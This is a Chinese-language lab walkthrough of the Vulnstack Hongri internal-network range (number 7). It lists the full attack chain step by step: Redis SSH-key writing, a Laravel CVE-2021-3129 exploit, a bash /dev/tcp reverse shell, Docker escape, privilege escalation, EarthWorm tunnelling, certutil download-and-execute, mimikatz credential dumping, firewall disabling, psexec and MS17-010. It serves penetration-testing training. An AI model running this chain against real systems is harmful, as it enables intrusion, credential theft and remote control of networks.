Vulnstack红日内网靶场(七)-学习过程笔记
字数 939 2025-08-11 17:39:49
Vulnstack红日内网靶场(七)渗透测试教学文档
一、靶场环境概述
1.1 网络拓扑
- DMZ区:Ubuntu主机,运行Redis服务
- 第二层网络:Ubuntu主机,运行Docker环境
- 第三层网络:Windows PC2,运行通达OA系统
1.2 环境准备
- DMZ区启动Redis服务:
sudo redis-server /etc/redis.conf - 第二层网络启动Docker:
sudo service docker start sudo docker start 8e172820ac78 - 第三层网络启动通达OA:
C:\MYOA\bin\AutoConfig.exe
二、外网渗透
2.1 信息收集
- 目标IP:192.168.0.127
- 扫描命令:
nmap -p- -T4 -A -v 192.168.0.127 - 开放端口:22(SSH)、80(HTTP)、81(HTTP)、6379(Redis)
2.2 Redis未授权访问利用
- 连接Redis:
redis-cli -h 192.168.0.127 - 写入SSH公钥:
ssh-keygen -t rsa (echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n") > f.txt cat f.txt | redis-cli -h 192.168.0.127 -p 6379 -x set hello config set dir /root/.ssh config set dbfilename authorized_keys - 通过SSH连接:
ssh root@192.168.0.127
2.3 Laravel框架漏洞利用
- 使用漏洞利用工具:
python laravel-CVE-2021-3129-EXP.py http://192.168.0.127:81 - 使用哥斯拉连接Webshell
三、内网横向移动
3.1 Docker环境突破
- 反弹Shell到Kali:
bash -c 'exec bash -i &>/dev/tcp/192.168.52.10/1237 <&1' - 特权模式逃逸:
mkdir f mount /dev/sda1 f - 写入SSH公钥:
echo '公钥内容' > /f/home/ubuntu/.ssh/authorized_keys ssh -i f ubuntu@192.168.52.20
3.2 提权操作
- SUID提权:
find / -perm -u=s -type f 2>/dev/null - 环境变量劫持:
cd /tmp echo "/bin/bash" > ps chmod 777 ps export PATH=/tmp:$PATH - 内核提权(CVE-2021-3493):
gcc exploit.c -o exploit chmod +x exploit ./exploit
四、域渗透
4.1 MSF路由设置
run get_local_subnets
run autoroute -s 192.168.52.0 -n 255.255.255.0
run autoroute -p
4.2 SOCKS5隧道搭建
- Kali监听:
./ew_for_linux64 -s rcsocks -l 1080 -e 1234 - 目标机连接:
nohup ./ew_for_linux64 -s rssocks -d 192.168.0.136 -e 1234 &
4.3 通达OA漏洞利用
- 漏洞版本:V11.3
- 利用文件包含漏洞获取Shell
- 文件下载执行:
certutil.exe -urlcache -split -f http://192.168.52.10:1009/win7_9091.exe
4.4 凭证获取
migrate <进程号>
load kiwi
kiwi_cmd privilege::debug
kiwi_cmd sekurlsa::logonPasswords
获取凭证:
- 域用户:bunny/Bunny2021
- 域管理员:administrator/Whoami2021
五、域控攻击
5.1 关闭防火墙
net use \\192.168.93.30\ipc$ "Whoami2021" /user:"Administrator"
sc \\192.168.93.30 create unablefirewall binpath= "netsh advfirewall set allprofiles state off"
sc \\192.168.93.30 start unablefirewall
5.2 psexec攻击
use exploit/windows/smb/psexec
set rhosts 192.168.93.30
set lport 9999
set SMBUser administrator
set SMBPass Whoami2021
set payload windows/meterpreter/bind_tcp
set rhost 192.168.93.30
run
5.3 永恒之蓝攻击
对192.168.93.40使用MS17-010漏洞攻击
六、工具列表
- Redis未授权访问利用:原生redis-cli
- Laravel漏洞利用:laravel-CVE-2021-3129-EXP
- Webshell管理:哥斯拉v2.92
- 隧道工具:EarthWorm(ew)
- 提权利用:CVE-2021-3493 exploit
- 扫描工具:Nmap、MSF
七、关键知识点总结
- Redis未授权访问的利用方法
- Docker特权模式逃逸技术
- 环境变量劫持提权
- 内网穿透与路由设置
- 域环境下的凭证获取方法
- 多层网络环境下的渗透路径规划
- 防火墙绕过技术
- 多种横向移动方法对比选择